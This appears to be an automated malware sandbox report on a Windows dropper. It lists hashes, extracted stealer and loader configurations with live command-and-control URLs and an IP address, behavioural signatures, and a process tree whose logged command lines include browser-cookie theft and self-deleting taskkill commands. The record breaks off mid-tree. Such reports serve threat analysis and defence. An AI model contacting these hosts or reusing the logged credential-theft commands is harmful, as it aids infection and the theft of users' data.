Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    120s
  • max time network
    1811s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    31-07-2021 17:21

General

  • Target

    8 (26).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://manicord.top/forum/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

3

C2

213.166.68.170:16810

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

vidar

Version

39.8

Botnet

903

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    903

Extracted

Family

vidar

Version

39.8

Botnet

937

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Nirsoft 1 IoCs
  • Vidar Stealer 8 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 45 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 21 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2800
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2780
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2696
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2536
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2528
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1948
              • C:\Users\Admin\AppData\Local\Temp\8 (26).exe
                "C:\Users\Admin\AppData\Local\Temp\8 (26).exe"
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:3788
                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3508
                  • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\setup_install.exe
                    "C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\setup_install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:3912
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_1.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4068
                      • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_1.exe
                        sonia_1.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1820
                        • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_1.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_1.exe" -a
                          6⤵
                          • Executes dropped EXE
                          PID:4108
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_3.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:700
                      • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_3.exe
                        sonia_3.exe
                        5⤵
                        • Executes dropped EXE
                        • Modifies system certificate store
                        PID:1228
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 1692
                          6⤵
                          • Suspicious use of NtCreateProcessExOtherParentProcess
                          • Program crash
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5060
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_2.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4088
                      • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_2.exe
                        sonia_2.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: MapViewOfSection
                        PID:1428
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_4.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1292
                      • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_4.exe
                        sonia_4.exe
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3864
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c sonia_5.exe
                      4⤵
                      • Suspicious use of WriteProcessMemory
                      PID:804
                      • C:\Users\Admin\AppData\Local\Temp\7zS4BDEBB04\sonia_5.exe
                        sonia_5.exe
                        5⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        PID:3700
                        • C:\Users\Admin\Documents\Ds7WBxRoOIsawtsZYSMP3apm.exe
                          "C:\Users\Admin\Documents\Ds7WBxRoOIsawtsZYSMP3apm.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4016
                          • C:\Users\Admin\Documents\Ds7WBxRoOIsawtsZYSMP3apm.exe
                            C:\Users\Admin\Documents\Ds7WBxRoOIsawtsZYSMP3apm.exe
                            7⤵
                            • Executes dropped EXE
                            PID:4624
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 4624 -s 1484
                              8⤵
                              • Program crash
                              PID:5292
                        • C:\Users\Admin\Documents\s43zsfG1AQ7MpPQG44k9uqKn.exe
                          "C:\Users\Admin\Documents\s43zsfG1AQ7MpPQG44k9uqKn.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3716
                          • C:\Users\Admin\Documents\s43zsfG1AQ7MpPQG44k9uqKn.exe
                            "C:\Users\Admin\Documents\s43zsfG1AQ7MpPQG44k9uqKn.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:4460
                        • C:\Users\Admin\Documents\_mUvemJnuafYVZGaFA1dVKCP.exe
                          "C:\Users\Admin\Documents\_mUvemJnuafYVZGaFA1dVKCP.exe"
                          6⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:4128
                          • C:\Users\Admin\Documents\_mUvemJnuafYVZGaFA1dVKCP.exe
                            C:\Users\Admin\Documents\_mUvemJnuafYVZGaFA1dVKCP.exe
                            7⤵
                            • Executes dropped EXE
                            PID:2992
                        • C:\Users\Admin\Documents\IzKTwr7dJzwf2ZfPnxf81jVa.exe
                          "C:\Users\Admin\Documents\IzKTwr7dJzwf2ZfPnxf81jVa.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4440
                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            7⤵
                            • Executes dropped EXE
                            PID:4160
                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                            7⤵
                              PID:4684
                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                              7⤵
                                PID:3456
                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                7⤵
                                  PID:5336
                              • C:\Users\Admin\Documents\ptUTkzV8TCreZ_L7BOCTQtU1.exe
                                "C:\Users\Admin\Documents\ptUTkzV8TCreZ_L7BOCTQtU1.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:4372
                                • C:\Users\Admin\Documents\ptUTkzV8TCreZ_L7BOCTQtU1.exe
                                  "C:\Users\Admin\Documents\ptUTkzV8TCreZ_L7BOCTQtU1.exe"
                                  7⤵
                                    PID:5832
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                                      8⤵
                                        PID:4216
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe"
                                          9⤵
                                            PID:4116
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                          8⤵
                                            PID:5952
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xa8,0xcc,0xd0,0x64,0xd4,0x7ff8ed744f50,0x7ff8ed744f60,0x7ff8ed744f70
                                              9⤵
                                                PID:5228
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1688 /prefetch:2
                                                9⤵
                                                  PID:5232
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2200 /prefetch:8
                                                  9⤵
                                                    PID:5588
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1744 /prefetch:8
                                                    9⤵
                                                      PID:4288
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2592 /prefetch:1
                                                      9⤵
                                                        PID:5556
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2600 /prefetch:1
                                                        9⤵
                                                          PID:2792
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
                                                          9⤵
                                                            PID:4452
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
                                                            9⤵
                                                              PID:4728
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1396 /prefetch:1
                                                              9⤵
                                                                PID:6096
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
                                                                9⤵
                                                                  PID:4768
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4944 /prefetch:8
                                                                  9⤵
                                                                    PID:4872
                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                    9⤵
                                                                      PID:5716
                                                                      • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                        "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff65865a890,0x7ff65865a8a0,0x7ff65865a8b0
                                                                        10⤵
                                                                          PID:3828
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4356 /prefetch:8
                                                                        9⤵
                                                                          PID:308
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
                                                                          9⤵
                                                                            PID:5960
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2228 /prefetch:8
                                                                            9⤵
                                                                              PID:4352
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1672,3114709967132204058,17142759199255337208,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=904 /prefetch:2
                                                                              9⤵
                                                                              • Executes dropped EXE
                                                                              PID:4684
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /C taskkill /F /PID 5832 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ptUTkzV8TCreZ_L7BOCTQtU1.exe"
                                                                            8⤵
                                                                              PID:4644
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /F /PID 5832
                                                                                9⤵
                                                                                • Kills process with taskkill
                                                                                PID:5352
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /C taskkill /F /PID 5832 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ptUTkzV8TCreZ_L7BOCTQtU1.exe"
                                                                              8⤵
                                                                                PID:4760
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /F /PID 5832
                                                                                  9⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:5328
                                                                          • C:\Users\Admin\Documents\Yb5Ms0I0TubUBf0w5p40YPAl.exe
                                                                            "C:\Users\Admin\Documents\Yb5Ms0I0TubUBf0w5p40YPAl.exe"
                                                                            6⤵
                                                                              PID:2812
                                                                              • C:\Users\Admin\Documents\Yb5Ms0I0TubUBf0w5p40YPAl.exe
                                                                                "C:\Users\Admin\Documents\Yb5Ms0I0TubUBf0w5p40YPAl.exe"
                                                                                7⤵
                                                                                  PID:4804
                                                                              • C:\Users\Admin\Documents\FJ4KK6eBlesrmLhWQw16qwqb.exe
                                                                                "C:\Users\Admin\Documents\FJ4KK6eBlesrmLhWQw16qwqb.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4140
                                                                                • C:\Users\Admin\AppData\Roaming\1370363.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\1370363.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2796
                                                                                • C:\Users\Admin\AppData\Roaming\8274237.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\8274237.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2792
                                                                                • C:\Users\Admin\AppData\Roaming\8709784.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\8709784.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  PID:4792
                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4816
                                                                              • C:\Users\Admin\Documents\POS4S22ZGSA_cMhBKnteOFum.exe
                                                                                "C:\Users\Admin\Documents\POS4S22ZGSA_cMhBKnteOFum.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4136
                                                                              • C:\Users\Admin\Documents\SJ4BeamyWRcZMdqzmjCYJ7wj.exe
                                                                                "C:\Users\Admin\Documents\SJ4BeamyWRcZMdqzmjCYJ7wj.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4180
                                                                                • C:\Users\Admin\Documents\SJ4BeamyWRcZMdqzmjCYJ7wj.exe
                                                                                  C:\Users\Admin\Documents\SJ4BeamyWRcZMdqzmjCYJ7wj.exe
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5024
                                                                              • C:\Users\Admin\Documents\HdAH0rR2XVfYSzNLgutQ13Bx.exe
                                                                                "C:\Users\Admin\Documents\HdAH0rR2XVfYSzNLgutQ13Bx.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4156
                                                                                • C:\Users\Admin\Documents\HdAH0rR2XVfYSzNLgutQ13Bx.exe
                                                                                  "C:\Users\Admin\Documents\HdAH0rR2XVfYSzNLgutQ13Bx.exe"
                                                                                  7⤵
                                                                                    PID:5740
                                                                                • C:\Users\Admin\Documents\dLuhTmeubZTO1YzsIIJpdcOk.exe
                                                                                  "C:\Users\Admin\Documents\dLuhTmeubZTO1YzsIIJpdcOk.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks SCSI registry key(s)
                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                  PID:4220
                                                                                • C:\Users\Admin\Documents\SnlRLOEvcoB9XEftHB6yx_Yk.exe
                                                                                  "C:\Users\Admin\Documents\SnlRLOEvcoB9XEftHB6yx_Yk.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:4872
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                    7⤵
                                                                                      PID:5800
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /f /im chrome.exe
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Kills process with taskkill
                                                                                        PID:2812
                                                                                  • C:\Users\Admin\Documents\iejjTqDfzvPgWxEONe7DdFV_.exe
                                                                                    "C:\Users\Admin\Documents\iejjTqDfzvPgWxEONe7DdFV_.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2312
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 660
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5020
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 708
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:2260
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 728
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5324
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 820
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5496
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1080
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5888
                                                                                  • C:\Users\Admin\Documents\POhCGjJw3Ce87IqXbVVy4MxX.exe
                                                                                    "C:\Users\Admin\Documents\POhCGjJw3Ce87IqXbVVy4MxX.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2552
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 660
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:4728
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 676
                                                                                      7⤵
                                                                                      • Program crash
                                                                                      PID:5180
                                                                                  • C:\Users\Admin\Documents\EpyvlKc2L0DWguZzrsxopVU2.exe
                                                                                    "C:\Users\Admin\Documents\EpyvlKc2L0DWguZzrsxopVU2.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Program Files directory
                                                                                    PID:4300
                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3560
                                                                                    • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                      "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                      7⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2880
                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                          PID:5660
                                                                                        • C:\Users\Admin\AppData\Local\Temp\11111.exe
